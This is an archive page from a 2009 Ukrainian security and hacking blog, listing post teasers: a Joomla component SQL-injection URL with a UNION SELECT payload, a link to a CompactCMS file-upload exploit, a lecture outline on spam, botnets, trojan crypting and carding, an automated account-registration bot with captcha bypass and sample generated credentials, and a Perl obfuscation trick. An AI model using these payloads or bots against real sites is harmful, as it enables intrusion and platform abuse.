Archive

Archive for October, 2009

Google Wave: Інвайти

October 31st, 2009 Dimi4 49 comments

Сьогодні я став щасливчиком та магічним способом отримав інвайт на Google Wave! А сталось це так: зайшов гмейл, та побачив лист з наступним повідомленням: (як отримати інвайт – читайте далі)
Read more…

[Python2.6] Модуль для роботи з Antigate.com

October 30th, 2009 login999 3 comments

Ну ось, щось затихло на блозі, вирішив викласти свій класс для роботи з антикапчею (antigate.com).

Стандартний приклад вже аж занадто мені не подобається.

Read more…

Лекції для студентів по безпеці

October 18th, 2009 presidentua 7 comments

Збулася моя мрія, і в цьому місяці з допомоги Хаханова Володимира Івановича я буду проводити в Харківському Національному Університеті Радіоелектроніки 8 лекцій по безпеці:

Технологическая культура против хакерского мира
1. Введения в хакерский мир. Структура, иерархия хакерского мира.
Общее рассмотрение всех отраслей хакинга.
2. Почта. Уязвимости почтовых протоколов. Е-майл спам. Монетизация
е-майл спама. Написания скриптов для спама. Способы защиты.
3. Социальные сети. Веб-спам. Монетизация веб-спама. Капча и
антикапча. Написание автореггеров. Способы защиты.
4. Социальная инженерия. Практическое применения. Фейк. Практика
создания фейка. Способы защиты.
5. Ботнет сети. Способы создания. Монетизация. Текущий рынок ботнет
сетей. Создание идеальной ботнет-сети.
6. Троянские программы. Создание. Криптовка. Обход антивирусов.
7. Веб-безопасность. Виды уязвимостей сайтов. Рассмотрение уязвимостей
вида XSS, Inlude, SQL-inj и других. Способы их устранения.
8. Взлом и банковская информация. Кредитные карты. Скимеры. Способы защиты.

Тож якщо ви студент з Харкова і є бажання послухати лекції, то ласкаво просимо – для цього лише потрібно відіслати маленький лист – подробиці на http://tutamc.com/node/224.

CompactCMS Remote Arbitrary File Upload Exploit

October 15th, 2009 Dimi4 4 comments

Писав вже давно, лежало в RoA на античаті,  тепер думаю немає ніякого сенсу зберігати його в приваті.

http://uasc.org.ua/files/compactcms.php.txt
Read more…

Фішинг

October 13th, 2009 presidentua 11 comments

Вчора був дуже гарний настрій і тут під руку попав один фішер, що надумав мене розвести і вкрасти пароль від Гмайла в результаті записав скрінаст:

Дивитися краще в HD якості тут – АнтиФішінг from presidentua.

Вразливості компонентів Joomla/Mambo (01)

October 12th, 2009 Dimi4 No comments

Компонент: Projects

Тип вразливості: SQL-injection

Знайдено: 27.09.2009

Знайшов: Dimi4
index?option=com_projects&Itemid=62&idProyecto=27+UNION+SELECT+1,2,CONCAT_WS(0x3a,Version(),Database(),User()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--

Read more…

[Python] Парсер файлообмінників (slil.ru, webfile.ru, dump.ru, ifolder.ru)

October 12th, 2009 login999 11 comments

perl обфускатор

October 12th, 2009 poma 5 comments

upd: обновив до версії 2.0
сьогодні написав “обфускатор”, який базується лише на одному алгоритму.. час від часу буду додавати в нього алгоритми )
http://nxadm.files.wordpress.com/2008/05/perl.jpg
для прикладу, запустіть у себе такий скрипт:

''=~('(?{'.('AC94AiUz29Y9oEd8AQ7vRY' ^ '11PZ5Iw2WU5VCe3W3=SWpb').'$/})');

в результаті побачите:
Hello, World!
як воно працює, і про сам обфускатор, читаємо далі..
Read more…

активні xss на mail.ua

October 8th, 2009 poma 5 comments

сьогодні у меня зявилася можливість протестувати цей сервіс..
http://m-ua.net/img/skin/default/index/logo.jpg
результат тесту: 3 активкні xss і маленька поправка ))
Read more…

Categories: Безпека Tags: ,

автореггер pornoLab.net

October 1st, 2009 poma 3 comments

http://static.pornolab.net/images/logo/logo.gif
автореггер (perl) : проксі / антикапча (+капчабот) / багатопоточність

[ Pornolab.Net Regger ] poma.2009
last update 01.10.09

☺ threads: 5
☻ Started at [ Thu Oct 1 21:43:39 2009 ]

+ ntvjfdotaibfe:feduousobege
+ pfscojnh:woceafeuji
+ tujmhvtzpbxcfw:qpeefvzt
+ hhlyhsbjqolb:rtclapixmmb
+ ruyrytbgogoe:emrnmqyr
+ klwfdqnxkpfes:hkufhecsuakod

Read more…

Categories: Кодинг Tags: